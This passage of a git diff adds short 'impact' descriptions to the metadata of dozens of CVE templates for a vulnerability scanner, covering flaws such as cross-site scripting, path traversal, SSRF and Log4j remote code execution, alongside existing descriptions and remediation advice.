| Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Simple Client Management System 1.0. reference: diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index f34adf5155..761a3a8bb5 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Atmail to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index e751aa88c5..1b2a12c730 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 20849c0556..1bbb93c118 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -6,6 +6,8 @@ info: severity: high description: | kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to a patched version of kkFileview v4.0.1 or later, or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index a01b177a6b..320143a0f0 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file. reference: - https://github.com/AK-blank/CVE-2021-43778 diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index e43ae9bc7a..785aad54c6 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -5,6 +5,8 @@ info: author: z0ne,dhiyaneshDk,j4vaovo severity: high description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index 2d37d7beb5..76983d1dea 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to version 4.0.12 or later. reference: - https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index b77b770e1d..98d256e0b6 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -5,6 +5,8 @@ info: author: Adam Crosser,gy741 severity: critical description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine ServiceDesk Plus. reference: diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 0d8694c816..a88334158f 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive data exposure. remediation: | Upgrade Caucho Resin to a version higher than 4.0.56 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 855ec3fe3b..080c2ebaba 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send crafted requests from the server, potentially leading to unauthorized access to internal resources or network scanning. remediation: | Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139). reference: diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 5a4ba1fa97..3f6d472f03 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Reprise License Manager. remediation: | Apply the latest security patch or upgrade to a patched version of Reprise License Manager to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 9ba276dd26..7817befeb6 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, potentially compromising the affected system. remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). reference: - https://logging.apache.org/log4j/2.x/security.html diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index 7ad88c0cc6..7b2bebb77b 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -5,6 +5,8 @@ info: author: furkansayim,xShuden severity: critical description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database, modify data, or execute arbitrary SQL commands. remediation: Upgrade to version 8.1.1 or higher. reference: - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328 diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index d63a143025..54bfd80c3b 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can gain unauthorized access to the Apache Superset application. remediation: Upgrade to Apache Superset 1.4.0 or higher. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index 987e9a5441..bff8d6b55c 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -5,6 +5,8 @@ info: author: Adam Crosser severity: critical description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. reference: - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 67a1c35462..64428c8c4e 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. + impact: | + This vulnerability can lead to phishing attacks, where users are tricked into visiting malicious websites and disclosing sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Open Redirect vulnerability in the Host Authorization Middleware. reference: diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 94a032de69..0904fa7e6c 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -5,6 +5,8 @@ info: author: duty_1g,phyr3wall,Tirtha severity: critical description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody). + impact: | + Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system. remediation: | Apply the latest security patches provided by Ivanti to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 6a1f6ef0d6..cc5bd60753 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -5,6 +5,8 @@ info: author: danielmofer severity: medium description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.) + impact: | + An attacker can use the gathered usernames for further attacks, such as brute-forcing passwords or launching targeted phishing campaigns. remediation: | Apply the vendor-supplied patch or upgrade to the latest version of Thinfinity VirtualUI to mitigate the user enumeration vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index 7fb73137e1..448b57d08c 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -5,6 +5,8 @@ info: author: Momen Eldawakhly,Evan Rubinstein severity: high description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in HD-Network Realtime Monitoring System 2.0. reference: diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 6db7ac0c03..dd20037519 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -5,6 +5,8 @@ info: author: ImNightmaree severity: critical description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Log4j2. reference: diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index a89aff9d9e..bfefc49cbf 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -5,6 +5,8 @@ info: author: danielmofer severity: critical description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential remote code execution. remediation: | Apply the latest security patches or updates provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 2f7f22882e..d2b89bc5ac 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -5,6 +5,8 @@ info: author: Mr-xn severity: critical description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication. + impact: | + An attacker can gain unauthorized access to the API, potentially leading to data breaches or unauthorized actions. remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard. reference: - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/ diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 71a3dc4b78..fb01acffb2 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 8a660c5aa5..3ae34addb7 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Reprise License Manager 14.2. reference: diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 3a2a3fb9a9..6bb45ecbf8 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + impact: | + Successful exploitation of this vulnerability could result in unauthorized accessand data leakage. remediation: | Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 003f874041..482e6b350b 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability. + impact: | + The vulnerability can result in unauthorized access to sensitive data or systems, potentially leading to further exploitation or compromise. remediation: | Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967). reference: diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 65b3b6e38a..fafcce943c 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability. + impact: | + The vulnerability can be exploited by an attacker to gain unauthorized access to sensitive information, execute arbitrary code, or perform other malicious activities. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS. reference: diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index dc9d53e008..aab404397f 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index b6d8d3cbf5..5e5d54c227 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 24e4deac39..3154eb92e7 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index b30da81d27..f52a745148 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 736f0a24e1..2698242bee 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Service List section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index e1b46b8cd4..62478c5c12 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index 488ee43d2e..f45224cc71 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. + impact: | + The impact of this vulnerability is significant as it can result in unauthorized access to sensitive data or systems. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 38e192dc21..1ad2fa83ef 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest firmware update provided by D-Link to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 4ef1d7df94..113c2eb454 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network. remediation: | Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index df42c29812..34facc0682 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: medium description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 7abb32283b..a8f10b7da2 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 0e244d0f7f..7fe65ce4e5 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 81b42b9952..7ea4c0335e 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. + impact: | + Successful exploitation could lead to loss of critical data or system instability. remediation: | Apply the latest patch or update provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 718396095d..580ae064a3 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of GenieACS or apply the necessary security patches to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 655226b815..9010e3736f 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 6b251edaf7..8d87aed2ab 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Cookie Information/Free GDPR Consent Solution plugin (2.0.8 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index 4f6a267a8b..21cee2100b 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index baddf9d36f..445637f16a 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index 9127f5726f..9aef91c50d 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or defacement of the affected WordPress website. remediation: | Update to WordPress Accessibility Helper version 0.6.0.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index 